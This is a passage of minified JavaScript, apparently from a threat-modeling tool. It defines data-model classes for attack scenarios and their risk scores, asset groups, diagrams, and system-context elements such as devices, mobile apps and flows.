0:a.map(e=>e.ID)}get ThreatSources(){let a=[];return this.Data.threatActorIDs.forEach(e=>a.push(this.project.GetThreatActor(e))),a}set ThreatSources(a){this.Data.threatActorIDs=null==a?void 0:a.map(e=>e.ID)}get LinkedScenarios(){let a=[];return this.Data.linkedScenarioIDs.forEach(e=>a.push(this.project.GetAttackScenario(e))),a}set LinkedScenarios(a){this.Data.linkedScenarioIDs=null==a?void 0:a.map(e=>e.ID)}get MyTags(){let a=[];return this.Data.myTagIDs.forEach(e=>a.push(this.project.GetMyTag(e))),a}set MyTags(a){this.Data.myTagIDs=null==a?void 0:a.map(e=>e.ID)}SetMapping(a,e,i,n,r,c,d,T){var k,q;this.MappingState=zn.New,this.Mapping.Threat={AttackVectorID:a,ThreatCategoryIDs:e},r&&(this.ThreatRule=r,this.Description=r.Description,r.Severity?this.Severity=r.Severity:this.AttackVector&&(this.Severity=this.AttackVector.Severity),!(null===(q=null===(k=r.AttackVector)||void 0===k?void 0:k.AttackTechnique)||void 0===q)&&q.CVSS&&(this.ScoreCVSS=JSON.parse(JSON.stringify(r.AttackVector.AttackTechnique.CVSS)))),c&&(this.ThreatQuestion=c,0==this.Description.length&&(this.Description=c.Description)),d&&T?(this.ThreatMnemonicLetterID=T.ID,this.Name=T.Name+" on "+(null==i?void 0:i.GetProperty("Name")),this.Description=T.Description,T.threatCategoryID&&(this.ThreatCategories=[d.GetThreatCategory(T)])):this.Name=null,this.Target=i,this.Targets=n,this.RuleStillApplies=!0}CalculateRisk(){if(null!=this.Severity&&null!=this.Likelihood){const a=this.Likelihood,e=this.Severity;let i=cn.Critical;e==cn.None?i=cn.None:a==dr.High?[cn.High,cn.Medium].includes(e)?i=cn.High:e==cn.Low&&(i=cn.Medium):a==dr.Medium?i=e:a==dr.Low&&(i=cn.Low,[cn.Medium,cn.High].includes(e)?i=cn.Medium:e==cn.Critical&&(i=cn.High)),this.Risk=i}}AddLinkedAttackScenario(a){this.LinkedScenarios.includes(a)||this.Data.linkedScenarioIDs.push(a.ID)}RemoveLinkedAttackScenario(a){const e=this.Data.linkedScenarioIDs.indexOf(a);e>=0&&this.Data.linkedScenarioIDs.splice(e,1)}AddMyTag(a){this.MyTags.includes(a)||this.Data.myTagIDs.push(a.ID)}RemoveMyTag(a){const e=this.Data.myTagIDs.indexOf(a);e>=0&&this.Data.myTagIDs.splice(e,1)}GetCountermeasures(){return this.project.GetCountermeasuresApplicable().filter(a=>a.AttackScenarios.includes(this))}GetTestCases(){return this.project.GetTestCases().filter(a=>a.LinkedScenarios.includes(this))}GetAffectedAssetObjects(){let a=[];return this.Target&&this.Target.GetProperty("ProcessedData")&&a.push(...this.Target.GetProperty("ProcessedData")),this.Targets&&this.Targets.forEach(e=>{e.GetProperty("ProcessedData")&&e.GetProperty("ProcessedData").forEach(i=>{a.includes(i)||a.push(i)})}),a}GetDiagram(){return this.project.GetView(this.ViewID)}CheckUniqueNumber(){return this.project.GetAttackScenarios().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){var a;return"AS"+Gi.EmptyIfNull(this.Number)+") "+this.Name+" ("+(this.Target?this.Target.GetProperty("Name"):null===(a=this.Targets)||void 0===a?void 0:a.map(e=>e.GetProperty("Name")).join(", "))+")"}FindReferences(a,e){let i=[];return null==a||a.GetCountermeasures().filter(n=>n.AttackScenarios.includes(this)).forEach(n=>i.push({Type:li.RemoveAttackScenarioFromCountermeasure,Param:n})),null==a||a.GetAttackScenarios().filter(n=>n.LinkedScenarios.includes(this)).forEach(n=>i.push({Type:li.RemoveAttackScenarioFromAttackScenario,Param:n})),null==a||a.GetTestCases().filter(n=>n.LinkedScenarios.includes(this)).forEach(n=>i.push({Type:li.RemoveAttackScenarioFromTestCase,Param:n})),i}OnDelete(a,e){this.MappingState=zn.Removed,this.FindReferences(a,e).forEach(n=>{n.Type==li.RemoveAttackScenarioFromCountermeasure?n.Param.RemoveAttackScenario(this.ID):(n.Type==li.RemoveAttackScenarioFromAttackScenario||n.Type==li.RemoveAttackScenarioFromTestCase)&&n.Param.RemoveLinkedAttackScenario(this.ID)})}static FromJSON(a,e,i){return new Rc(a,e,i)}}var dr=(()=>{return(t=dr||(dr={}))[t.Low=1]="Low",t[t.Medium=2]="Medium",t[t.High=3]="High",dr;var t})();class An{static GetKeys(){return[dr.Low,dr.Medium,dr.High]}static ToString(a){switch(a){case dr.Low:return"general.Low";case dr.Medium:return"general.Medium";case dr.High:return"general.High"}}}class Pu extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Sensitivity||(this.Sensitivity=dr.Medium),this.ImpactCats||(this.Data.ImpactCats=[])}get IsProjectData(){return null!=this.project}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get IsNewAsset(){return this.Data.IsNewAsset}set IsNewAsset(a){this.Data.IsNewAsset=a,a&&(this.AddProperty("general.Number","Number","",!0,Ii.TextBoxValidator,!0,null,"CheckUniqueNumber"),this.properties.splice(2,0,this.properties.splice(this.GetProperties().length-1,1)[0]),this.properties.splice(this.GetProperties().findIndex(e=>e.Type==Ii.AssignNumberToAsset),1))}get Sensitivity(){return this.Data.Sensitivity}set Sensitivity(a){this.Data.Sensitivity=a&&Number(a)}get ImpactCats(){return this.Data.ImpactCats}FindAssetGroup(){return this.project?this.project.GetAssetGroups().find(a=>a.AssociatedData.includes(this)):this.config.GetAssetGroups().find(a=>a.AssociatedData.includes(this))}CheckUniqueNumber(){return this.project.GetMyDatas().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"A"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){return[]}OnDelete(a,e){let n=(this.IsProjectData?a:e).GetAssetGroups().find(r=>r.AssociatedData.includes(this));n&&n.RemoveMyData(this)}initProperties(){super.initProperties(),this.IsNewAsset?this.AddProperty("general.Number","Number","",!0,Ii.TextBoxValidator,!0,null,"CheckUniqueNumber"):this.AddProperty("general.Number","","",!1,Ii.AssignNumberToAsset,!0),this.AddProperty("properties.Sensitivity","Sensitivity","",!0,Ii.LowMediumHighSelect,!0),Vs.GetKeys().forEach(a=>this.AddProperty(Vs.ToString(a),"ImpactCats-"+a.toString(),"",!1,Ii.ImpactCategory,!0,!1))}static FromJSON(a,e,i){return new Pu(a,e,i)}}let Zl=(()=>{class t extends Ln{constructor(e,i,n){super(e),this.project=i,this.config=n,this.Data.assetGroupIDs||(this.Data.assetGroupIDs=[]),this.Data.associatedDataIDs||(this.Data.associatedDataIDs=[]),this.ImpactCats||(this.Data.ImpactCats=[]),null==this.IsActive&&(this.IsActive=!0)}get file(){return this.IsProjectAsset?this.project:this.config}get IsProjectAsset(){return null!=this.project}get IsActive(){return this.Data.IsActive}set IsActive(e){this.Data.IsActive=e,e&&this.Parent?this.Parent.IsActive=e:e||this.SubGroups.forEach(i=>i.IsActive=e)}get Number(){return this.Data.Number}set Number(e){this.Data.Number=e&&String(e)}get IsNewAsset(){return this.Data.IsNewAsset}set IsNewAsset(e){this.Data.IsNewAsset=e,e&&(this.AddProperty("general.Number","Number","",!0,Ii.TextBoxValidator,!0,null,"CheckUniqueNumber"),this.properties.splice(2,0,this.properties.splice(this.GetProperties().length-1,1)[0]),this.properties.splice(this.GetProperties().findIndex(i=>i.Type==Ii.AssignNumberToAsset),1))}get SubGroups(){let e=[];return this.Data.assetGroupIDs.forEach(i=>e.push(this.file.GetAssetGroup(i))),e}get AssociatedData(){let e=[];return this.Data.associatedDataIDs.forEach(i=>e.push(this.file.GetMyData(i))),e}set AssociatedData(e){this.Data.associatedDataIDs=null==e?void 0:e.map(i=>i.ID)}get Parent(){return this.file.GetAssetGroups().find(e=>e.SubGroups.includes(this))}get ImpactCats(){return this.Data.ImpactCats}AddAssetGroup(e){this.SubGroups.includes(e)||this.Data.assetGroupIDs.push(e.ID)}RemoveAssetGroup(e){this.SubGroups.includes(e)&&this.Data.assetGroupIDs.splice(this.Data.assetGroupIDs.indexOf(e.ID),1)}AddMyData(e){this.AssociatedData.includes(e)||this.Data.associatedDataIDs.push(e.ID)}RemoveMyData(e){this.AssociatedData.includes(e)&&this.Data.associatedDataIDs.splice(this.Data.associatedDataIDs.indexOf(e.ID),1)}GetMyDataFlat(){let e=[];return e.push(...this.AssociatedData),this.SubGroups.forEach(i=>e.push(...i.GetMyDataFlat())),e}GetGroupsFlat(){let e=[];return this.SubGroups.forEach(i=>{e.push(i),e.push(...i.GetGroupsFlat())}),e}CheckUniqueNumber(){return this.project.GetAssetGroups().some(e=>e.Number==this.Number&&e.ID!=this.ID)}GetLongName(){return"A"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(e,i){let n=[];return this.AssociatedData.forEach(r=>n.push({Type:li.DeleteMyData,Param:r})),this.SubGroups.forEach(r=>n.push({Type:li.DeleteAssetGroup,Param:r})),n}OnDelete(e,i){let n=this.file.GetAssetGroups().find(c=>c.SubGroups.includes(this));n&&n.RemoveAssetGroup(this),this.FindReferences(e,i).forEach(c=>{c.Type==li.DeleteMyData?this.file.DeleteMyData(c.Param):c.Type==li.DeleteAssetGroup&&this.file.DeleteAssetGroup(c.Param)})}initProperties(){super.initProperties(),this.IsNewAsset?this.AddProperty("general.Number","Number","",!0,Ii.TextBoxValidator,!0,null,"CheckUniqueNumber"):this.AddProperty("general.Number","","",!1,Ii.AssignNumberToAsset,!0),this.AddProperty("properties.IsActive","IsActive","",!0,Ii.CheckBox,!0),Vs.GetKeys().forEach(e=>this.AddProperty(Vs.ToString(e),"ImpactCats-"+e.toString(),"",!1,Ii.ImpactCategory,!0,!1))}static FromJSON(e,i,n){return new t(e,i,n)}}return t.Icon="account_balance",t})();var xn=(()=>{return(t=xn||(xn={})).Hardware="HW",t.DataFlow="DF",t.Context="CTX",t.UseCase="UC",xn;var t})();class ns extends Ln{constructor(a,e,i){super(a),this.project=e,this.Settings||(this.Settings={GenerationThreatLibrary:!0,GenerationAssetBased:!1,GenerationMnemonics:{},GenerationRules:{}}),this.Settings.GenerationMnemonics||(this.Settings.GenerationMnemonics={}),this.Settings.GenerationRules||(this.Settings.GenerationRules={})}get elementsID(){return this.Data.elementsID}set elementsID(a){this.Data.elementsID=a}get Name(){return this.Data.Name}set Name(a){this.Data.Name=a,this.Elements&&(this.Elements.Name=a),this.NameChanged.emit(a)}get Canvas(){return this.Data.Canvas}set Canvas(a){a!=this.Data.Canvas&&(this.Data.Canvas=a)}get DiagramType(){return this.Data.DiagramType}set DiagramType(a){this.Data.DiagramType=a}get Settings(){return this.Data.Settings}set Settings(a){this.Data.Settings=a}static FromJSON(a,e,i){return a.DiagramType==xn.Hardware||a.DiagramType==xn.DataFlow?new Vg(a,e,i):a.DiagramType==xn.Context||a.DiagramType==xn.UseCase?new b2(a,e,i):void 0}}class Vg extends ns{get Elements(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDFDElement(this.elementsID)}constructor(a,e,i){if(super(a,e,i),!this.Elements){let n=new Ys({},Ys.GetDefaultType(i),e,i);e.AddDFDElement(n),this.elementsID=n.ID}}FindReferences(a,e){let i=[];return this.Elements.GetChildrenFlat().forEach(n=>{i.push({Type:li.DeleteDFDElement,Param:n})}),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteDFDElement&&a.DeleteDDFElement(n.Param)}),a.DeleteDDFElement(this.Elements)}static FromJSON(a,e,i){return new Vg(a,e,i)}}class b2 extends ns{get Elements(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetContextElement(this.elementsID)}get IsUseCaseDiagram(){return this.Data.IsUseCaseDiagram}set IsUseCaseDiagram(a){this.Data.IsUseCaseDiagram=a}constructor(a,e,i){if(super(a,e,i),!this.elementsID){let n=new sf({},e,i);e.AddContextElement(n),this.elementsID=n.ID}}FindReferences(a,e){return[]}OnDelete(a,e){}}class pT extends Ln{constructor(a,e,i){super(a),this.project=e,this.Data.contextDiagramID||(this.ContextDiagram=e.CreateDiagram(xn.Context),this.ContextDiagram.Name="System Context",this.ContextDiagram.Elements.Name="System Context Diagram"),this.Data.useCaseDiagramID||(this.UseCaseDiagram=e.CreateDiagram(xn.UseCase),this.UseCaseDiagram.Name="Use Cases",this.UseCaseDiagram.Elements.Name="Use Case Diagram"),this.UseCaseDiagram&&(this.UseCaseDiagram.IsUseCaseDiagram=!0)}get ContextDiagram(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDiagram(this.Data.contextDiagramID)}set ContextDiagram(a){this.Data.contextDiagramID=a.ID}get UseCaseDiagram(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDiagram(this.Data.useCaseDiagramID)}set UseCaseDiagram(a){this.Data.useCaseDiagramID=a.ID}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new pT(a,e,i)}}var Aa=(()=>{return(t=Aa||(Aa={}))[t.None=0]="None",t[t.Device=1]="Device",t[t.Interface=2]="Interface",t[t.Interactor=3]="Interactor",t[t.UseCase=4]="UseCase",t[t.Flow=5]="Flow",t[t.TrustArea=6]="TrustArea",t[t.MobileApp=7]="MobileApp",t[t.ExternalEntity=8]="ExternalEntity",Aa;var t})();class nM{static Constructor(a){switch(a){case Aa.Device:return Ou;case Aa.MobileApp:return cf;case Aa.Interface:return xG;case Aa.Interactor:return AG;case Aa.UseCase:return b5;case Aa.Flow:return M2;case Aa.TrustArea:return sf;case Aa.ExternalEntity:return wG;default:return console.error("Missing Element Type in ContextElementTypeUtil.Constructor()",a),null}}static ToString(a){switch(a){case Aa.Device:return"Device";case Aa.MobileApp:return"App";case Aa.Interface:return"Device Interface";case Aa.Interactor:return"Interactor";case Aa.UseCase:return"Use Case";case Aa.Flow:return"Flow";case Aa.TrustArea:return"Trust Area";case Aa.ExternalEntity:return"External Entity";case Aa.None:return"Container";default:return console.error("Missing Element Type in ContextElementTypeUtil.ToString()",a),null}}}class os extends Np{constructor(a,e,i,n){var r;super(a),this.TypeChanged=new Tt,this.project=i,this.Type=e,0==(null===(r=this.Name)||void 0===r?void 0:r.length)&&(this.Name=i?Gi.FindUniqueName(nM.ToString(e),i.GetContextElements().map(c=>c.GetProperty("Name"))):e.toString())}get Type(){return this.Data.Type}set Type(a){this.Data.Type=a,this.TypeChanged.emit(a)}get Parent(){return this.project.GetContextElement(this.Data.parentID)||null}set Parent(a){this.Parent&&this.Parent.ID!=a.ID&&this.Parent.RemoveChild(this),this.Data.parentID=a.ID}FindReferences(a,e){let i=super.FindReferences(a,e);return null==a||a.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).forEach(n=>i.push({Type:li.DeleteElementReferences,Param:n})),null==a||a.GetContextElements().filter(n=>{var r,c;return n instanceof M2&&[null===(r=n.Sender)||void 0===r?void 0:r.ID,null===(c=n.Receiver)||void 0===c?void 0:c.ID].includes(this.ID)}).forEach(n=>i.push({Type:li.DeleteContextFlow,Param:n})),i}OnDelete(a,e){super.OnDelete(a,e),this.FindReferences(a,e).forEach(n=>{(n.Type==li.DeleteElementReferences||n.Type==li.DeleteContextFlow)&&a.DeleteContextElement(n.Param)}),null!=this.Parent&&this.Parent.RemoveChild(this)}static Instantiate(a,e,i){return new(nM.Constructor(a))({},e,i)}static FromJSON(a,e,i){let n,r=a.Type;if(a.refID)n=new Ts(a,a.Type,e,i);else if(r==Aa.Device)n=new Ou(a,e,i);else if(r==Aa.MobileApp)n=new cf(a,e,i);else if(r==Aa.Interface)n=new xG(a,e,i);else if(r==Aa.Interactor)n=new AG(a,e,i);else if(r==Aa.UseCase)n=new b5(a,e,i);else if(r==Aa.Flow)n=new M2(a,e,i);else if(r==Aa.ExternalEntity)n=new wG(a,e,i);else{if(r!=Aa.None)throw new Error("Unknown Type: "+a.Type);n=new sf(a,e,i)}return n}}var So=(()=>{return(t=So||(So={})).None="properties.deviceinterfacenames.None",t.HumanInterface="properties.deviceinterfacenames.HumanInterface",t.MachineInterface="properties.deviceinterfacenames.MachineInterface",t.Environment="properties.deviceinterfacenames.Environment",So;var t})();let Ou=(()=>{class t extends os{constructor(e,i,n){if(super(e,Aa.Device,i,n),this.DeviceInterfaceNameChanged=new Tt,!this.Data.assetGroupID){let r=i.InitializeNewAssetGroup(n);this.Data.assetGroupID=r.ID}this.Data.hardwareDiagramID||(this.HardwareDiagram=i.CreateDiagram(xn.Hardware)),this.Data.softwareStackID||this.CreateSoftwareStack(),0==i.GetDevices().length&&!this.Data.processStackID&&this.CreateProcessStack(),this.Data.checklistIDs||(this.Data.checklistIDs=[]),null==this.InterfaceTop&&(this.InterfaceTop=So.None,this.InterfaceRight=So.MachineInterface,this.InterfaceBottom=So.Environment,this.InterfaceLeft=So.HumanInterface),this.Name=this.Name}get Name(){return this.Data.Name}set Name(e){this.Data.Name=e,null!=this.HardwareDiagram&&(this.HardwareDiagram.Name=this.Name+"'s Hardware"),null!=this.SoftwareStack&&(this.SoftwareStack.Name=this.Name+"'s Software"),null!=this.ProcessStack&&(this.ProcessStack.Name=this.Name+"'s Processes"),this.NameChanged.emit(e)}get AssetGroup(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetAssetGroup(this.Data.assetGroupID)}get HardwareDiagram(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetDiagram(this.Data.hardwareDiagramID)}set HardwareDiagram(e){this.Data.hardwareDiagramID=e.ID}get SoftwareStack(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetStack(this.Data.softwareStackID)}set SoftwareStack(e){this.Data.softwareStackID=e.ID}get ProcessStack(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetStack(this.Data.processStackID)}set ProcessStack(e){this.Data.processStackID=e.ID}get InterfaceTop(){return this.Data.InterfaceTop}set InterfaceTop(e){this.Data.InterfaceTop=e,this.DeviceInterfaceNameChanged.emit()}get InterfaceRight(){return this.Data.InterfaceRight}set InterfaceRight(e){this.Data.InterfaceRight=e,this.DeviceInterfaceNameChanged.emit()}get InterfaceBottom(){return this.Data.InterfaceBottom}set InterfaceBottom(e){this.Data.InterfaceBottom=e,this.DeviceInterfaceNameChanged.emit()}get InterfaceLeft(){return this.Data.InterfaceLeft}set InterfaceLeft(e){this.Data.InterfaceLeft=e,this.DeviceInterfaceNameChanged.emit()}get Checklists(){let e=[];return this.Data.checklistIDs.forEach(i=>e.push(this.project.GetChecklist(i))),e}set Checklists(e){this.Data.checklistIDs=null==e?void 0:e.map(i=>i.ID)}CreateSoftwareStack(){return this.SoftwareStack||(this.SoftwareStack=this.project.CreateStack(zr.Software),this.project.Config.GetMyComponentSWTypeGroups().forEach(e=>e.Types.forEach(i=>this.SoftwareStack.AddChild(this.project.CreateComponent(i)))),this.SoftwareStack.Name=this.Name+"'s Software"),this.SoftwareStack}DeleteSoftwareStack(){this.project.DeleteStack(this.SoftwareStack)}CreateProcessStack(){return this.ProcessStack||(this.ProcessStack=this.project.CreateStack(zr.Process),this.project.Config.GetMyComponentPTypeGroups().forEach(e=>e.Types.forEach(i=>this.ProcessStack.AddChild(this.project.CreateComponent(i)))),this.ProcessStack.Name=this.Name+"'s Processes"),this.ProcessStack}DeleteProcessStack(){this.project.DeleteStack(this.ProcessStack)}AddChecklist(e){this.Checklists.includes(e)||this.Data.checklistIDs.push(e.ID)}RemoveChecklist(e){this.Checklists.includes(e)&&this.Data.checklistIDs.splice(this.Data.checklistIDs.indexOf(e.ID),1)}GetAttackScenariosApplicable(){let e=[];this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.project.GetSysContext().ContextDiagram.ID).filter(n=>n.Targets.includes(this)).forEach(n=>e.push(n));let i=this.project.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).find(n=>{var r;return(null===(r=this.project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)==this.project.GetSysContext().UseCaseDiagram.ID});return i&&this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.project.GetSysContext().UseCaseDiagram.ID).filter(n=>n.Targets.includes(i)).forEach(n=>e.push(n)),this.HardwareDiagram&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.HardwareDiagram.ID)),this.SoftwareStack&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.SoftwareStack.ID)),this.ProcessStack&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.ProcessStack.ID)),e}GetCountermeasuresApplicable(){let e=[];this.project.GetCountermeasures().filter(n=>n.ViewID==this.project.GetSysContext().ContextDiagram.ID).filter(n=>n.Targets.includes(this)).forEach(n=>e.push(n));let i=this.project.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).find(n=>{var r;return(null===(r=this.project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)==this.project.GetSysContext().UseCaseDiagram.ID});return i&&this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.project.GetSysContext().UseCaseDiagram.ID).filter(n=>n.Targets.includes(i)).forEach(n=>e.push(n)),this.HardwareDiagram&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.HardwareDiagram.ID)),this.SoftwareStack&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.SoftwareStack.ID)),this.ProcessStack&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.ProcessStack.ID)),e}FindReferences(e,i){let n=super.FindReferences(e,i);return this.HardwareDiagram&&n.push({Type:li.DeleteDiagram,Param:this.HardwareDiagram}),this.SoftwareStack&&n.push({Type:li.DeleteStack,Param:this.SoftwareStack}),this.ProcessStack&&n.push({Type:li.DeleteStack,Param:this.ProcessStack}),this.AssetGroup&&n.push({Type:li.DeleteAssetGroup,Param:this.AssetGroup}),this.Checklists.forEach(r=>n.push({Type:li.DeleteChecklist,Param:r})),n}OnDelete(e,i){super.OnDelete(e,i),this.FindReferences(e,i).forEach(r=>{r.Type==li.DeleteDiagram?e.DeleteDiagram(r.Param):r.Type==li.DeleteStack?e.DeleteStack(r.Param):r.Type==li.DeleteAssetGroup?e.DeleteAssetGroup(r.Param):r.Type==li.DeleteChecklist&&e.DeleteChecklist(r.Param)})}initProperties(){super.initProperties(),this.AddProperty("properties.InterfaceTop","InterfaceTop","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceRight","InterfaceRight","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceBottom","InterfaceBottom","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceLeft","InterfaceLeft","",!0,Ii.DevInterfaceName,!0)}}return t.Icon="memory",t})();class sf extends os{constructor(a,e,i){super(a,Aa.None,e,i),this.ChildrenChanged=new Tt,this.Data.childrenIDs||(this.Data.childrenIDs=[])}get children(){let a=[];return this.Data.childrenIDs.forEach(e=>a.push(this.project.GetContextElement(e))),a.sort((e,i)=>e.GroupId>=i.GroupId?1:-1)}get Root(){return this.project.GetContextElement(this.Data.rootID)}set Root(a){this.Data.rootID=null==a?void 0:a.ID}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextBox}AddChild(a){null!=a?this.Data.childrenIDs.includes(a.ID)||(this.Data.childrenIDs.push(a.ID),a.Parent=this,this.project.AddContextElement(a),a instanceof sf&&(a.Root=this.Root?this.Root:this),this.Root?this.Root.ChildrenChanged.emit(!0):this.ChildrenChanged.emit(!0)):console.error("child undefined")}RemoveChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}DeleteChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.project.DeleteContextElement(a),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}GetChildren(){return this.children}GetChildrenFlat(){let a=[];return a.push(...this.GetChildren()),this.GetChildren().forEach(e=>{e instanceof sf&&a.push(...e.GetChildrenFlat())}),a}FindReferences(a,e){let i=super.FindReferences(a,e);return this.children.length>0&&i.push({Type:li.MoveChildElements,Param:this.Parent}),i}OnDelete(a,e){super.OnDelete(a,e),this.FindReferences(a,e).forEach(n=>{n.Type==li.MoveChildElements&&this.GetChildren().forEach(r=>this.Parent.AddChild(r))})}}class AG extends os{constructor(a,e,i){super(a,Aa.Interactor,e,i)}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextBox}}var ed=(()=>{return(t=ed||(ed={}))[t.Solid=1]="Solid",t[t.Dashed=2]="Dashed",ed;var t})();class TG{static GetKeys(){return[ed.Solid,ed.Dashed]}static ToString(a){switch(a){case ed.Solid:return"properties.Solid";case ed.Dashed:return"properties.Dashed"}}}var wn=(()=>{return(t=wn||(wn={}))[t.Start=1]="Start",t[t.End=2]="End",t[t.Both=3]="Both",t[t.Initiator=4]="Initiator",t[t.None=5]="None",wn;var t})();class EG{static GetKeys(){return[wn.Start,wn.End,wn.Both,wn.Initiator,wn.None]}static ToString(a){switch(a){case wn.Start:return"properties.flowarrowpositions.Start";case wn.End:return"properties.flowarrowpositions.End";case wn.Both:return"properties.flowarrowpositions.Both";case wn.Initiator:return"properties.flowarrowpositions.Initiator";case wn.None:return"properties.flowarrowpositions.None"}}}var Xs=(()=>{return(t=Xs||(Xs={}))[t.Normal=1]="Normal",t[t.Extend=2]="Extend",t[t.Include=3]="Include",Xs;var t})();class DG{static GetKeys(){return[Xs.Normal,Xs.Extend,Xs.Include]}static ToString(a){switch(a){case Xs.Normal:return"properties.Normal";case Xs.Extend:return"properties.Extend";case Xs.Include:return"properties.Include"}}}class M2 extends os{constructor(a,e,i){super(a,Aa.Flow,e,i),this.LineTypeChanged=new Tt,this.ArrowPosChanged=new Tt,this.BendFlowChanged=new Tt,this.DirectionChanged=new Tt,this.AnchorChanged=new Tt,this.Data.FlowType||(this.FlowType=Xs.Normal),this.Data.LineType||(this.LineType=ed.Solid),this.Data.ArrowPos||(this.ArrowPos=wn.End),null==this.Data.ShowName&&(this.ShowName=!1)}get Sender(){return this.project.GetContextElement(this.Data.senderID)}set Sender(a){this.Data.senderID=null==a?void 0:a.ID}get Receiver(){return this.project.GetContextElement(this.Data.receiverID)}set Receiver(a){this.Data.receiverID=null==a?void 0:a.ID}get FlowType(){return this.Data.FlowType}set FlowType(a){this.Data.FlowType=Number(a),a==Xs.Extend||a==Xs.Include?(this.ShowName=!0,this.LineType=ed.Dashed,this.ArrowPos=a==Xs.Extend?wn.Start:wn.End):(this.ShowName=!1,this.LineType=ed.Solid,this.ArrowPos=wn.End),this.NameChanged.emit(this.Name)}get ShowName(){return this.Data.ShowName}set ShowName(a){this.Data.ShowName=a,this.NameChanged.emit(this.GetProperty("Name"))}get BendFlow(){return this.Data.BendFlow}set BendFlow(a){this.Data.BendFlow=a,this.BendFlowChanged.emit(a)}get LineType(){return this.Data.LineType}set LineType(a){this.Data.LineType=Number(a),this.LineTypeChanged.emit(a)}get ArrowPos(){return this.Data.ArrowPos}set ArrowPos(a){this.Data.ArrowPos=Number(a),this.ArrowPosChanged.emit(a)}ChangeDirection(){let a=this.Sender;this.Sender=this.Receiver,this.Receiver=a,this.DirectionChanged.emit()}initProperties(){super.initProperties(),this.AddProperty("properties.Sender","Sender","",!0,Ii.ElementName,!0),this.AddProperty("properties.Receiver","Receiver","",!0,Ii.ElementName,!0),this.AddProperty("properties.Direction","","",!1,Ii.DataFlowChangeDirection,!0),this.AddProperty("properties.FlowType","FlowType","",!0,Ii.FlowType,!0),this.AddProperty("properties.ShowName","ShowName","",!0,Ii.CheckBox,!0),this.AddProperty("properties.BendFlow","BendFlow","",!0,Ii.CheckBox,!0),this.AddProperty("properties.LineType","LineType","",!0,Ii.LineType,!0),this.AddProperty("properties.ArrowPos","ArrowPos","",!0,Ii.ArrowPosition,!0)}}class xG extends os{constructor(a,e,i){super(a,Aa.Interface,e,i)}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextBox}}class b5 extends os{get DataFlowDiagramID(){return this.Data.dataFlowDiagramID}set DataFlowDiagramID(a){this.Data.dataFlowDiagramID=a}constructor(a,e,i){super(a,Aa.UseCase,e,i)}initProperties(){super.initProperties(),this.AddProperty("properties.DataFlowDiagram","DataFlowDiagramID","properties.DataFlowDiagram.tt",!0,Ii.DataFlowDiagramReference,!0),this.AddProperty("properties.OpenDataFlowDiagram","DataFlowDiagramID","",!0,Ii.DataFlowDiagramReference,!1)}}let cf=(()=>{class t extends os{constructor(e,i,n){if(super(e,Aa.MobileApp,i,n),this.MobileAppInterfaceNameChanged=new Tt,!this.Data.assetGroupID){let r=i.InitializeNewAssetGroup(n);this.Data.assetGroupID=r.ID}this.Data.checklistIDs||(this.Data.checklistIDs=[]),null==this.InterfaceTop&&(this.InterfaceTop=So.None,this.InterfaceRight=So.MachineInterface,this.InterfaceBottom=So.None,this.InterfaceLeft=So.HumanInterface),this.Name=this.Name}get Name(){return this.Data.Name}set Name(e){this.Data.Name=e,null!=this.SoftwareStack&&(this.SoftwareStack.Name=this.Name+"'s Software"),null!=this.ProcessStack&&(this.ProcessStack.Name=this.Name+"'s Processes"),this.NameChanged.emit(e)}get AssetGroup(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetAssetGroup(this.Data.assetGroupID)}get SoftwareStack(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetStack(this.Data.softwareStackID)}set SoftwareStack(e){this.Data.softwareStackID=e.ID}get ProcessStack(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetStack(this.Data.processStackID)}set ProcessStack(e){this.Data.processStackID=e.ID}get InterfaceTop(){return this.Data.InterfaceTop}set 